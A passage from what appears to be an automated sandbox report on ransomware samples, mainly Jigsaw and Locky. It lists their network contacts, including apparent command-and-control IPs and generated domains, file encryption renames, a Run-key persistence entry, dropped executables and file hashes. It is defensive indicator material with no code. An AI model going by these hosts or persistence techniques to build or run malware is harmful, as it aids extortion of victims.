| FR | 178.33.163.65:6893 | udp | |
| FR | 178.33.163.66:6893 | udp | |
| FR | 178.33.163.67:6893 | udp | |
| FR | 178.33.163.68:6893 | udp | |
| FR | 178.33.163.69:6893 | udp | |
| FR | 178.33.163.70:6893 | udp | |
| FR | 178.33.163.71:6893 | udp | |
| FR | 178.33.163.72:6893 | udp | |
| FR | 178.33.163.73:6893 | udp | |
| FR | 178.33.163.74:6893 | udp | |
| FR | 178.33.163.75:6893 | udp | |
| FR | 178.33.163.76:6893 | udp | |
| FR | 178.33.163.77:6893 | udp | |
| FR | 178.33.163.78:6893 | udp | |
| FR | 178.33.163.79:6893 | udp | |
| FR | 178.33.163.80:6893 | udp | |
| FR | 178.33.163.81:6893 | udp | |
| FR | 178.33.163.82:6893 | udp | |
| FR | 178.33.163.83:6893 | udp | |
| FR | 178.33.163.84:6893 | udp | |
| FR | 178.33.163.85:6893 | udp | |
| FR | 178.33.163.86:6893 | udp | |
| FR | 178.33.163.87:6893 | udp | |
| FR | 178.33.163.88:6893 | udp | |
| FR | 178.33.163.89:6893 | udp | |
| FR | 178.33.163.90:6893 | udp | |
| FR | 178.33.163.91:6893 | udp | |
| FR | 178.33.163.92:6893 | udp | |
| FR | 178.33.163.93:6893 | udp | |
| FR | 178.33.163.94:6893 | udp | |
| FR | 178.33.163.95:6893 | udp | |
| FR | 178.33.163.96:6893 | udp | |
| FR | 178.33.163.97:6893 | udp | |
| FR | 178.33.163.98:6893 | udp | |
| FR | 178.33.163.99:6893 | udp | |
| FR | 178.33.163.100:6893 | udp | |
| FR | 178.33.163.101:6893 | udp | |
| FR | 178.33.163.102:6893 | udp | |
| FR | 178.33.163.103:6893 | udp | |
| FR | 178.33.163.104:6893 | udp | |
| FR | 178.33.163.105:6893 | udp | |
| FR | 178.33.163.106:6893 | udp | |
| FR | 178.33.163.107:6893 | udp | |
| FR | 178.33.163.108:6893 | udp | |
| FR | 178.33.163.109:6893 | udp | |
| FR | 178.33.163.110:6893 | udp | |
| FR | 178.33.163.111:6893 | udp | |
| FR | 178.33.163.112:6893 | udp | |
| FR | 178.33.163.113:6893 | udp | |
| FR | 178.33.163.114:6893 | udp | |
| FR | 178.33.163.115:6893 | udp | |
| FR | 178.33.163.116:6893 | udp | |
| FR | 178.33.163.117:6893 | udp | |
| FR | 178.33.163.118:6893 | udp | |
| FR | 178.33.163.119:6893 | udp | |
| FR | 178.33.163.120:6893 | udp | |
| FR | 178.33.163.121:6893 | udp | |
| FR | 178.33.163.122:6893 | udp | |
| FR | 178.33.163.123:6893 | udp | |
| FR | 178.33.163.124:6893 | udp | |
| FR | 178.33.163.125:6893 | udp | |
| FR | 178.33.163.126:6893 | udp | |
| FR | 178.33.163.127:6893 | udp | |
| FR | 178.33.163.128:6893 | udp | |
| FR | 178.33.163.129:6893 | udp | |
| FR | 178.33.163.130:6893 | udp | |
| FR | 178.33.163.131:6893 | udp | |
| FR | 178.33.163.132:6893 | udp | |
| FR | 178.33.163.133:6893 | udp | |
| FR | 178.33.163.134:6893 | udp | |
| FR | 178.33.163.135:6893 | udp | |
| FR | 178.33.163.136:6893 | udp | |
| FR | 178.33.163.137:6893 | udp | |
| FR | 178.33.163.138:6893 | udp | |
| FR | 178.33.163.139:6893 | udp | |
| FR | 178.33.163.140:6893 | udp | |
| FR | 178.33.163.141:6893 | udp | |
| FR | 178.33.163.142:6893 | udp | |
| FR | 178.33.163.143:6893 | udp | |
| FR | 178.33.163.144:6893 | udp | |
| FR | 178.33.163.145:6893 | udp | |
| FR | 178.33.163.146:6893 | udp | |
| FR | 178.33.163.147:6893 | udp | |
| FR | 178.33.163.148:6893 | udp | |
| FR | 178.33.163.149:6893 | udp | |
| FR | 178.33.163.150:6893 | udp | |
| FR | 178.33.163.151:6893 | udp | |
| FR | 178.33.163.152:6893 | udp | |
| FR | 178.33.163.153:6893 | udp | |
| FR | 178.33.163.154:6893 | udp | |
| FR | 178.33.163.155:6893 | udp | |
| FR | 178.33.163.156:6893 | udp | |
| FR | 178.33.163.157:6893 | udp | |
| FR | 178.33.163.158:6893 | udp | |
| FR | 178.33.163.159:6893 | udp | |
| FR | 178.33.163.160:6893 | udp | |
| FR | 178.33.163.161:6893 | udp | |
| FR | 178.33.163.162:6893 | udp | |
| FR | 178.33.163.163:6893 | udp | |
| FR | 178.33.163.164:6893 | udp | |
| FR | 178.33.163.165:6893 | udp | |
| FR | 178.33.163.166:6893 | udp | |
| FR | 178.33.163.167:6893 | udp | |
| FR | 178.33.163.168:6893 | udp | |
| FR | 178.33.163.169:6893 | udp | |
| FR | 178.33.163.170:6893 | udp | |
| FR | 178.33.163.171:6893 | udp | |
| FR | 178.33.163.172:6893 | udp | |
| FR | 178.33.163.173:6893 | udp | |
| FR | 178.33.163.174:6893 | udp | |
| FR | 178.33.163.175:6893 | udp | |
| FR | 178.33.163.176:6893 | udp | |
| FR | 178.33.163.177:6893 | udp | |
| FR | 178.33.163.178:6893 | udp | |
| FR | 178.33.163.179:6893 | udp | |
| FR | 178.33.163.180:6893 | udp | |
| FR | 178.33.163.181:6893 | udp | |
| FR | 178.33.163.182:6893 | udp | |
| FR | 178.33.163.183:6893 | udp | |
| FR | 178.33.163.184:6893 | udp | |
| FR | 178.33.163.185:6893 | udp | |
| FR | 178.33.163.186:6893 | udp | |
| FR | 178.33.163.187:6893 | udp | |
| FR | 178.33.163.188:6893 | udp | |
| FR | 178.33.163.189:6893 | udp | |
| FR | 178.33.163.190:6893 | udp | |
| FR | 178.33.163.191:6893 | udp | |
| FR | 178.33.163.192:6893 | udp | |
| FR | 178.33.163.193:6893 | udp | |
| FR | 178.33.163.194:6893 | udp | |
| FR | 178.33.163.195:6893 | udp | |
| FR | 178.33.163.196:6893 | udp | |
| FR | 178.33.163.197:6893 | udp | |
| FR | 178.33.163.198:6893 | udp | |
| FR | 178.33.163.199:6893 | udp | |
| FR | 178.33.163.200:6893 | udp | |
| FR | 178.33.163.201:6893 | udp | |
| FR | 178.33.163.202:6893 | udp | |
| FR | 178.33.163.203:6893 | udp | |
| FR | 178.33.163.204:6893 | udp | |
| FR | 178.33.163.205:6893 | udp | |
| FR | 178.33.163.206:6893 | udp | |
| FR | 178.33.163.207:6893 | udp | |
| FR | 178.33.163.208:6893 | udp | |
| FR | 178.33.163.209:6893 | udp | |
| FR | 178.33.163.210:6893 | udp | |
| FR | 178.33.163.211:6893 | udp | |
| FR | 178.33.163.212:6893 | udp | |
| FR | 178.33.163.213:6893 | udp | |
| FR | 178.33.163.214:6893 | udp | |
| FR | 178.33.163.215:6893 | udp | |
| FR | 178.33.163.216:6893 | udp | |
| FR | 178.33.163.217:6893 | udp | |
| FR | 178.33.163.218:6893 | udp | |
| FR | 178.33.163.219:6893 | udp | |
| FR | 178.33.163.220:6893 | udp | |
| FR | 178.33.163.221:6893 | udp | |
| FR | 178.33.163.222:6893 | udp | |
| FR | 178.33.163.223:6893 | udp | |
| FR | 178.33.163.224:6893 | udp | |
| FR | 178.33.163.225:6893 | udp | |
| FR | 178.33.163.226:6893 | udp | |
| FR | 178.33.163.227:6893 | udp | |
| FR | 178.33.163.228:6893 | udp | |
| FR | 178.33.163.229:6893 | udp | |
| FR | 178.33.163.230:6893 | udp | |
| FR | 178.33.163.231:6893 | udp | |
| FR | 178.33.163.232:6893 | udp | |
| FR | 178.33.163.233:6893 | udp | |
| FR | 178.33.163.234:6893 | udp | |
| FR | 178.33.163.235:6893 | udp | |
| FR | 178.33.163.236:6893 | udp | |
| FR | 178.33.163.237:6893 | udp | |
| FR | 178.33.163.238:6893 | udp | |
| FR | 178.33.163.239:6893 | udp | |
| FR | 178.33.163.240:6893 | udp | |
| FR | 178.33.163.241:6893 | udp | |
| FR | 178.33.163.242:6893 | udp | |
| FR | 178.33.163.243:6893 | udp | |
| FR | 178.33.163.244:6893 | udp | |
| FR | 178.33.163.245:6893 | udp | |
| FR | 178.33.163.246:6893 | udp | |
| FR | 178.33.163.247:6893 | udp | |
| FR | 178.33.163.248:6893 | udp | |
| FR | 178.33.163.249:6893 | udp | |
| FR | 178.33.163.250:6893 | udp | |
| FR | 178.33.163.251:6893 | udp | |
| FR | 178.33.163.252:6893 | udp | |
| FR | 178.33.163.253:6893 | udp | |
| FR | 178.33.163.254:6893 | udp | |
| FR | 178.33.163.255:6893 | udp | |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/4052-1-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4052-0-0x0000000002200000-0x0000000002231000-memory.dmp
memory/4052-2-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4052-4-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4052-7-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4052-9-0x0000000000400000-0x0000000000435000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___SBY0RF1W_.txt
| MD5 | e6876e3bfcacbf038d67515b3e0bf014 |
| SHA1 | 736db64e0be634d2b60007bb959c17b04a30990b |
| SHA256 | b972ac1bed08d2cc4a0ba5707c595f75d959cb7345831492fbd1d8b3faf298b1 |
| SHA512 | 9024d74b2bc7cd4e6b785170203965c3b04a51f4a883e6a9c546cca08b78fe5bce7bf8ba3aef11288dc2a7ce15d0c43341d007bd35e4844104ed1d5b3071b026 |
C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___67EK9_.hta
| MD5 | acfe84d804976da05338f1804e7f5b8d |
| SHA1 | ace378193957309cf20849ea246633b6907cc975 |
| SHA256 | d0f6e4840e0f8b8a306a0a62d9743de62821f73f8f6303ec33e5934146a7b2e0 |
| SHA512 | 02ef68d4dbc4ab3f2ed4cc69657ae417b70f63c756f014100dc3ce2471e76b693e0d54d139e0f83e803f74602906a1e4848d118cf406686c25eab14f045ad300 |
memory/4052-383-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4052-404-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4052-405-0x0000000000440000-0x0000000000451000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:25
Platform
win7-20241023-en
Max time kernel
36s
Max time network
17s
Command Line
Signatures
Jigsaw Ransomware
Jigsaw family
Renames multiple (594) files with added filename extension
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_left.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24ImagesMask.bmp.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\add_up.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\icon.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_rest.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\whiteband.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_Premium.gif.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Templates\1033\BlackTieLetter.dotx.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\travel.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous_partly-cloudy.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\EnableInvoke.ppt.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\private_browsing.VisualElementsManifest.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\7-Zip\Lang\lv.txt.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\WinFXList.xml.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\gadget.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\46.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\MoveSet.potm.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\7-Zip\Lang\gl.txt.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_orange.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\35.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\is.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\Media Renderer\connectionmanager_dmr.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nl.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT\TableTextService\TableTextServiceYi.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\gadget.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_thunderstorm.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_h.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sw.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Templates\1033\ApothecaryNewsletter.dotx.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-middle.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.3.2.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_right.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\16-on-black.gif | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\14.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\7-Zip\Lang\an.txt.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.bmp | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\icon.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_right.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ipsita.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\gadget.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\gadget.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ast.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_rest.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\br.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_left.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1800 wrote to memory of 2744 | N/A | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
| PID 1800 wrote to memory of 2744 | N/A | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
| PID 1800 wrote to memory of 2744 | N/A | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\jigsaw.exe
"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe
Network
Files
memory/1800-0-0x000007FEF616E000-0x000007FEF616F000-memory.dmp
memory/1800-1-0x00000000005B0000-0x00000000005E8000-memory.dmp
memory/1800-5-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
| MD5 | 2773e3dc59472296cb0024ba7715a64e |
| SHA1 | 27d99fbca067f478bb91cdbcb92f13a828b00859 |
| SHA256 | 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7 |
| SHA512 | 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262 |
memory/2744-10-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp
memory/1800-9-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp
memory/1800-12-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp
memory/2744-11-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp
memory/2744-13-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp
C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif.fun
| MD5 | 580ee0344b7da2786da6a433a1e84893 |
| SHA1 | 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e |
| SHA256 | 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513 |
| SHA512 | 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\container.dat.fun
| MD5 | 8ebcc5ca5ac09a09376801ecdd6f3792 |
| SHA1 | 81187142b138e0245d5d0bc511f7c46c30df3e14 |
| SHA256 | 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880 |
| SHA512 | cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650 |
memory/2744-2040-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win7-20240903-en
Max time kernel
140s
Max time network
131s
Command Line
Signatures
Locky
Locky family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Locky.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Locky.exe
"C:\Users\Admin\AppData\Local\Temp\Locky.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | uftsfoen.yt | udp |
| US | 8.8.8.8:53 | iutmpmsonbt.us | udp |
| US | 8.8.8.8:53 | ahvfvogmnn.de | udp |
| US | 8.8.8.8:53 | nwsvnayfmdhdw.tf | udp |
| US | 8.8.8.8:53 | fjuvgrafdqqd.be | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | hpwjw.pw | udp |
| US | 162.249.64.234:80 | hpwjw.pw | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | hpwjw.pw | tcp |
| IE | 86.104.134.144:80 | tcp |
Files
memory/2148-0-0x0000000000220000-0x0000000000224000-memory.dmp
memory/2148-1-0x0000000000220000-0x0000000000224000-memory.dmp
memory/2148-2-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2148-4-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2148-5-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2148-8-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2148-10-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2148-12-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2148-13-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2148-14-0x0000000000400000-0x00000000007D1000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win10v2004-20241007-en
Max time kernel
140s
Max time network
145s
Command Line
Signatures
Locky
Locky family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Locky.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Locky.exe
"C:\Users\Admin\AppData\Local\Temp\Locky.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fjuvgrafdqqd.be | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hpwjw.pw | udp |
| US | 162.249.64.234:80 | hpwjw.pw | tcp |
| US | 8.8.8.8:53 | uftsfoen.yt | udp |
| US | 8.8.8.8:53 | iutmpmsonbt.us | udp |
| US | 8.8.8.8:53 | ahvfvogmnn.de | udp |
| US | 8.8.8.8:53 | nwsvnayfmdhdw.tf | udp |
| US | 8.8.8.8:53 | fjuvgrafdqqd.be | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | hpwjw.pw | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | uftsfoen.yt | udp |
| US | 8.8.8.8:53 | iutmpmsonbt.us | udp |
| US | 8.8.8.8:53 | ahvfvogmnn.de | udp |
| US | 8.8.8.8:53 | nwsvnayfmdhdw.tf | udp |
| US | 8.8.8.8:53 | fjuvgrafdqqd.be | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | hpwjw.pw | tcp |
| US | 8.8.8.8:53 | uftsfoen.yt | udp |
| US | 8.8.8.8:53 | iutmpmsonbt.us | udp |
| US | 8.8.8.8:53 | ahvfvogmnn.de | udp |
| US | 8.8.8.8:53 | nwsvnayfmdhdw.tf | udp |
| US | 8.8.8.8:53 | fjuvgrafdqqd.be | udp |
| IE | 86.104.134.144:80 | tcp |
Files
